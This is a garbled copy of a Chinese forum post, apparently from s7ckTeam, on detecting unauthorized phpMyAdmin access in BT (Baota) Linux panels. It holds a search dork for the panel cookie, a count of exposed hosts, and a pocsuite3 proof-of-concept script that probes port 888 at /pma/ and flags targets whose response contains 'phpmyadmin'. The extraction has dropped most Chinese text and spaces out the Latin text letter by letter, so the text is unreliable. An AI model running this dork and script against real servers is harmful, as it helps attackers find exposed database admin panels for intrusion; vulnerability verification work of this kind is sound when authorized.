[28525] 2020-08-24_宝塔LInux未授权访问phpMyAdmin漏洞检测

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-08-24_宝塔LInux未授权访问phpMyAdmin漏洞检测 L I n u x 访 p h p M y A d m i n O t s   2 0 2 0 - 0 8 - 2 4 l i n u x 访 p h p M y A d m i n d o r k " S e t - C o o k i e :   B T _ P A N E L _ 6 " 使 p o c s u i t e 3 B T _ U N A u t h _ A c c e s s _ P H P M y A d m i n . p y 8 5 1 6 / 3 2 2 4 6 6 4   =   0 . 2 6 4 % " " " I f   y o u   h a v e   i s s u e s   a b o u t   d e v e l o p m e n t ,   p l e a s e   r e a d : h t t p s : / / g i t h u b . c o m / k n o w n s e c / p o c s u i t e 3 / b l o b / m a s t e r / d o c s / C O D I N G . m d f o r   m o r e   a b o u t   i n f o r m a t i o n ,   p l z   v i s i t   h t t p : / / p o c s u i t e . o r g " " " f r o m   u r l l i b . p a r s e   i m p o r t   u r l p a r s e f r o m   p o c s u i t e 3 . a p i   i m p o r t   O u t p u t ,   P O C B a s e ,   r e g i s t e r _ p o c ,   l o g g e r ,   r e q u e s t s c l a s s   D e m o P O C ( P O C B a s e ) :         v u l I D   =   ' '     #   s s v i d         v e r s i o n   =   ' 3 . 0 '         a u t h o r   =   [ ' ' ]         v u l D a t e   =   ' 2 0 2 0 - 8 - 2 4 '         c r e a t e D a t e   =   ' 2 0 2 0 - 8 - 2 4 '         u p d a t e D a t e   =   ' 2 0 2 0 - 8 - 2 4 '         r e f e r e n c e s   =   [ ' ' ]         n a m e   =   ' B T   U N A u t h '         a p p P o w e r L i n k   =   ' '         a p p N a m e   =   ' B T '         a p p V e r s i o n   =   ' '         v u l T y p e   =   ' U N A u t h '         d e s c   =   ' ' '
h t t p s : / / g i t h u b . c o m / Y I G E B E A C H / B T - U N A U T H - A c c e s s - P H P M y A d m i n         d e s c   =   ' ' '         ' ' '         s a m p l e s   =   [ ]         i n s t a l l _ r e q u i r e s   =   [ ' ' ]         d e f   e x p l o i t ( s e l f ,   m o d e ) :                 r e s u l t   =   { }                 u r l _ p r   =   u r l p a r s e ( s e l f . u r l )                 s c h e m e   =   u r l _ p r . s c h e m e                 h o s t   =   u r l _ p r . h o s t n a m e                 p o r t   =   8 8 8                 v u l _ u r l   =   " { } : / / { } : { } / p m a / " . f o r m a t ( s c h e m e ,   h o s t ,   p o r t )                 r e s p   =   r e q u e s t s . g e t ( v u l _ u r l ,   t i m e o u t = 5 )                 i f   r e s p . s t a t u s _ c o d e   = =   2 0 0   a n d   " p h p m y a d m i n "   i n   r e s p . t e x t :                         r e s u l t [ ' V e r i f y I n f o ' ]   =   { }                         r e s u l t [ ' V e r i f y I n f o ' ] [ ' U R L ' ]   =   v u l _ u r l                 r e t u r n   r e s u l t         d e f   _ v e r i f y ( s e l f ) :                 r e s u l t   =   { }                 t r y :                         r e s u l t   =   s e l f . e x p l o i t ( m o d e = ' v e r i f y ' )                 e x c e p t   E x c e p t i o n   a s   e :                         l o g g e r . e r r o r ( s t r ( e ) )                 r e t u r n   s e l f . p a r s e _ o u t p u t ( r e s u l t )         d e f   _ a t t a c k ( s e l f ) :                 r e t u r n   s e l f . _ v e r i f y ( )         d e f   p a r s e _ o u t p u t ( s e l f ,   r e s u l t ) :                 o u t p u t   =   O u t p u t ( s e l f )                 i f   r e s u l t :                         o u t p u t . s u c c e s s ( r e s u l t )                 e l s e :                         o u t p u t . f a i l ( ' t a r g e t   i s   n o t   v u l n e r a b l e ' )                 r e t u r n   o u t p u t r e g i s t e r _ p o c ( D e m o P O C )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则